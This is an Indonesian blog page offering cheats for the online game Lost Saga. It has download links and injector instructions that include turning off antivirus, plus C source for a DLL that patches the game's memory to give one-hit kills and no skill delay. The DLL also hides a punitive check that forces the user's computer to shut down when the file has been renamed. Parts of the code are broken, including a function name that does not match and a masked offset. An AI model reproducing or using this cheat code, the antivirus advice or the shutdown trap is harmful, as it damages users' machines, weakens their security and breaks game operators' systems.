Showing posts with label Cheat Lost Saga. Show all posts
Showing posts with label Cheat Lost Saga. Show all posts
Langsung saja, berikut base lsnya :




 Sumber :
Padang-Xp



Cheat Lost Saga 21 Juli 2012, Cheat LS No Delay 21 Juli 2012 New HACK NO DELAY

Don't to show off!
Downloads Cheat
LANGSUNG ADF.ly Click Here

Download Perx Injector 21 Juli 2012 dulu Download disini 


Credit :
Anwar Enjoy ( Anwar SB )

Tambahan
Sebelum pakai cheatnya,, baca tutor baik2,,,, 
cheat ini lain ama yang lain :D


Feature's & Hotkey's :
INGAT AKtifkan No delay aja ia mas
biar tahan NO DC

 Fitur!
No DELAY : F1 On | f2 OFF
INGAT AKtifkan No delay aja ia mas

New Tutorial

    Tekan Hotkeynya Waktu   GG Mau Ilang  TIMING mas biar gak DC
    Dan Tekan OFF saat Loading ( New ) 

( banyak yang bertanyak Loading New ) 
Loading New ( Waktu Loading selamatPuasa lhoe... Paham ) (^_^)

aktifkannya ada 2 cara mas,,,
1. Waktu GG nongol ( kadang DC )
2. Waktu GG Ilang Pass ( Layar blank ) (Y) NO DC

OFFnya
Waktu Loading Penuh mas,, Di jamin NO DC krn telah di uji beberapa kompi yang berbeda mas :D
Ada cheat terbaru nih Gan ^_^
Langsung Ada Di Lihat Fiturnya

Downloads Cheat

Gk Punya Injector Klik disini

Please to follow my blog. and like my FanPage! :)), 1 like it will be useful for me

 Sumber : http://www.andre-tkj.net/2012/07/lost-sagafast-delay-terbaru.html#ixzz20zGtfFSh
Link Download : 
Password : 
Scream-Crew
Bukti bisa lihat diatas!!



CARA MENGGUNAKAN PERX INJECTOR BUAT UNTUK LOST SAGA.
1. Agan Buka PerX Injector (Pasti)
2. Agan klick yang What To Inject, Ganti jadi lostsaga.exe
3. Agan Klick Select Dll For Inject, Browse Dan pilih .dll yang mau di inject ke lostsaga.
4. Centang Automaticcaly.
5. Buka Lostsaga.
6. Login Lostsaga.
Danseterusnya sampai inject cheatnya cek di bawah!

Credit :
[-] Scream-Crew Community

Fitur :
1.  1 Hit Crusade : F1 On|F2 Off
2.  Fast Delay : F3 On|F4 Off


Cara Penggunaan :

bisa gunakan injector mu sendiri


1.Buka PerX.exe < DI Setting dulu apabila anda mengunakan WINDOWS 7 >
2cara setting check di atas, win 7 cek di bawah
3.Buka Lost Saga Indonesia Launcher / lswebbroker.exe
4.Isi ID sama Password <<< masak gini di bilang keyloger>??? << yg coment ja bocah pasti tuh,,!!
kalo gak isi id sama password cara mainnya gmana gan ,, hayoooo jelaskan coba,,, hadeh,, kan Losatsaga setelah buka launchernya harus isi password sama idnya,,,YANG BILANG KEYLOGER GAK USAH DOWNLOAD!!!!
TQ
5.Ada Notice » Klik OK
6.Saat Gambar Koboy Hilang » Tunggu 3 - 4 detik’an / Saat Menyambung Ke Server
7.Trus Pencet Hotkeys F1 (jika mau 1 hit crusade)
8.Kemudian Masuk Ke Lost Sagakan
9.Saat Loading Gambar Puppeeter penuh
10.Langsung cepet² pencet F2
11.Enjoy Cheating


NB : Jika DC, berarti timing kurang tepat atau salah pemakaian.
Tested By Me WorkBAGI WIndows 7
NB : Matikan Antivirus Anda apabila PerX.exe terdeteksi sebagai Virus :D
1.Klik Kanan pada Perx.exe » Klik Properties
2. Kemudian Klik Pada » Tab Compatibility

3.Kemudian
- Centang “Run This Program in Compatibility Mode For” 
- Pilih “WIndows XP Service Pack 2”
Centang juga dibagian bawah “Run This Program As Administrator”

-Klik Apply + OK
-SELESAI DEHH :D
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

//============ OFFSET ============
#define OneHitCSD 0x8F2CB0    // cari sendiri jangan ngemmis aja
#define Health 0x******  // cari sendiri jangan ngemis aja
#define NoDelay 0x8E1779 // cari sendiri jangan ngemis aja
//============ OFFSET ============

LPTSTR ModulGame = "lostsaga.exe";

void Patch(void *adr, void *ptr, int size)

{

DWORD OldProtection;
VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection);
memcpy(adr,ptr,size);
VirtualProtect(adr,size,OldProtection, &OldProtection);
}
void WritePointer(unsigned long ulBase, int iOffset, int iValue)
{
if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long)))
{
if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long)))
{
*(int*)(*(unsigned long*)ulBase + iOffset) = iValue;
}
}
}
void SagaBlog()
{
while(1)
{


//========== 1 Hit Crusade ==========//
if (GetAsyncKeyState(VK_F1)&1) { // Hotkey ON
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)OneHitCSD;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00", 1); // Jangan di ganti Agar WORK
}
}

if (GetAsyncKeyState(VK_F2)&1) { // Hotkey OFF
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)OneHitCSD;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x4D", 1); // Jangan di ganti Agar WORK
}
}

//========== Fast Delay ==========//
if (GetAsyncKeyState(VK_F3)&1) { // Hotkey ON
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)NoDelay;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x68\x61\x73", 3); // Jangan di ganti Agar WORK
}
}

if (GetAsyncKeyState(VK_F4)&1) { // Hotkey OFF
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)NoDelay;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x6D\x61\x78", 3); // Jangan di ganti Agar WORK
}
}

//========== Health ==========//
if (GetAsyncKeyState(VK_F5)&1) { // Hotkey ON
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)Health;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00", 1); // Jangan di ganti Agar WORK
}
}
if (GetAsyncKeyState(VK_F6)&1) { // Hotkey OFF
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)Health;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x6D", 1); // Jangan di ganti Agar WORK
}
}

Sleep(5); // Berikan jeda
}

}

BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved) {

DisableThreadLibraryCalls(hDll);

if(callReason == DLL_PROCESS_ATTACH) {


MessageBox(0, "Credit by Sandy Irawan\n\n\n\nThankz to : \n[-] Liarosliana\n=xXx=SANDY IRAWAN GANTENG=xXx\n\nJoin :
http://th3-legacy.blogspot.com\n=================================", "||==== Sandy Irawan | Was Here ====||",MB_ICONINFORMATION | MB_OK); // Notice yg Keluar
MessageBox(0, "Liarosliana [Fullhacks]\n\nFitur & Hotkeys :\n[-] 1 Hit Crusade : F1 = ON | F2 = OFF\n[-]Fast Delay : F3 = ON | F4 = OFF\n[-]Brutal Skill : F5 = ON | F6 = OFF\n\nTekan Hotkeys ON saat Gambar Cowboy Hilang[Harus pas]\nLalu tekan OFF saat Loading Jin Kisaragi\n\nHANYA BISA 1 FITUR SAJA !\nKALO 2 FITUR MAKA AKAN ERROR / DC\n\n\n========================================\nFollow Blog : http://th3-legacy.blogspot.com\nJoin US : My Facebook : cangkudu55@yahoo.co.id", "~>|-|======= Fitur & Hotkeys ======|-|<~",MB_ICONINFORMATION | MB_OK); // Notice yg Keluar

CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SagaHacy,0, 0, 0);

char strDLLName [_MAX_PATH];

GetModuleFileName(hDll, strDLLName , _MAX_PATH);

if (strstr(strDLLName, "DLL.dll") <= 0) {//Nama DLL Asli
MessageBox(0, "Ente Leacher ?","Deteckor",MB_ICONSTOP | MB_OK); // tampilkan pesan, kalo dll nya sdh bukan asli / sudah di rename
MessageBox(0, "Udah dikasih kok rename ?","Deteckor",MB_ICONSTOP | MB_OK);
MessageBox(0, "Dadah !\nKompimu aku Restart ya :*","Deteckor",MB_ICONSTOP | MB_OK);
system("start C:/Windows/System32/shutdown.exe -s -f -t 00");
ExitProcess(0);//ERROR

}

}

}





SS Pemakaian + Author + Notice


Download : Click Here! (Just Dll)

test 1 jam

Followers